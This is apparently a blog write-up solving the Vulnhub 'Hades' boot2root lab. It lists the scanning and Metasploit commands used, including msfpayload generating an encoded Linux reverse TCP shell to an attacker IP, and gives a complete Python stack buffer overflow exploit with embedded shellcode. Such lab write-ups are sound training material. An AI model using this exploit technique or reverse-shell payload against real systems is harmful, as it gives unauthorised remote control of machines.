cracking the infernal hades

[Aerosol]

About a month ago, Vulnhub released a boot2root image built by Lok_Sigma called Hades. The box promised to be full of annoyances and it delivered them in droves. Requiring a combination of exploit development, reverse engineering and some out of the box thinking, I really enjoyed this challenge. I decided to share my solution now that the competition is over. It goes without saying this post has a lot of SPOILERS!

Big thanks go out to the Vulnhub team for the awesome work they do. Follow them on Twitter to keep up with the latest releases.

If you want to tackle Hades yourself, you can grab a copy of the machine here.

Enjoy


Commands Used

# Host Discoverynetdiscover -r 10.0.0.0/24
# Service Enumerationnmap -v -sS -T4 -n -p- 10.0.0.129 && us -mU -v -p 1-65535 10.0.0.129
# Base64 Decryptionbase64 -d ssh-hades > hades.bin
# Pattern Creation/opt/metasploit-framework/tools/pattern_create 1000
# Offset Search/opt/metasploit-framework/tools/pattern_offset.rb Af7A/opt/metasploit-framework/tools/pattern_offset.rb 5Af6/opt/metasploit-framework/tools/pattern_offset.rb 0x34654133
# Finding Assembly Shellcode/opt/metasploit-framework/tools/metasm_shell.rbmetasm> jmp $esp+80
# Reverse Shell Payloadmsfpayload linux/x86/shell_reverse_tcp LHOST=10.0.0.130 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -b \x00\x0a\x0d -t python
# Improved Shellpython -c "import pty; pty.spawn('/bin/sh')"
# File Decryptionopenssl enc -d -aes-256-cbc -in flag.txt.enc -out flag.txt -pass file:key_file

Finished Exploit – Hades

#!/usr/bin/env python
import socket, struct
target = '10.0.0.129'port = 65535
# Shellcode# msfpayload linux/x86/shell_reverse_tcp LHOST=10.0.0.130 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -b \x00\x0a\x0d -t python# [*] x86/shikata_ga_nai succeeded with size 95 (iteration=1)
buf =  ""buf += "\xda\xc7\xd9\x74\x24\xf4\x5d\xba\xc4\xe0\xc2\x40\x  2b"buf += "\xc9\xb1\x12\x83\xed\xfc\x31\x55\x13\x03\x91\xf3\x  20"buf += "\xb5\x28\x2f\x53\xd5\x19\x8c\xcf\x70\x9f\x9b\x11\x  34"buf += "\xf9\x56\x51\xa6\x5c\xd9\x6d\x04\xde\x50\xeb\x6f\x  b6"buf += "\x68\x0b\x90\xc4\x05\x09\x90\xd9\x89\x84\x71\x69\x  57"buf += "\xc7\x20\xda\x2b\xe4\x4b\x3d\x86\x6b\x19\xd5\x36\x  43"buf += "\xed\x4d\x21\xb4\x73\xe4\xdf\x43\x90\xa4\x4c\xdd\x  b6"buf += "\xf8\x78\x10\xb8"
# Buffer#buffer = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5A  b6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2  Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae  9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5A  g6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2  Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj  9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5A  l6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2  An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao  9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5A  q6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2  As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At  9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5A  v6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2  Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay  9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5B  a6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2  Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd  9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5B  f6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2  B'buffer = '\x90'*11buffer += bufbuffer += '\x90'*(131-95-11)buffer += '\xeb\x4e\x90\x90' # esp - 0x2cbuffer += 'F'*(167-4-131)buffer += 'B'*4 # ebpbuffer += struct.pack("<L",0x08048694) # eipbuffer += 'D'*(1000-4-4-167)
# Connect and send payloads = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.connect((target, port))s.send(buffer)data = s.recv(1024)s.close()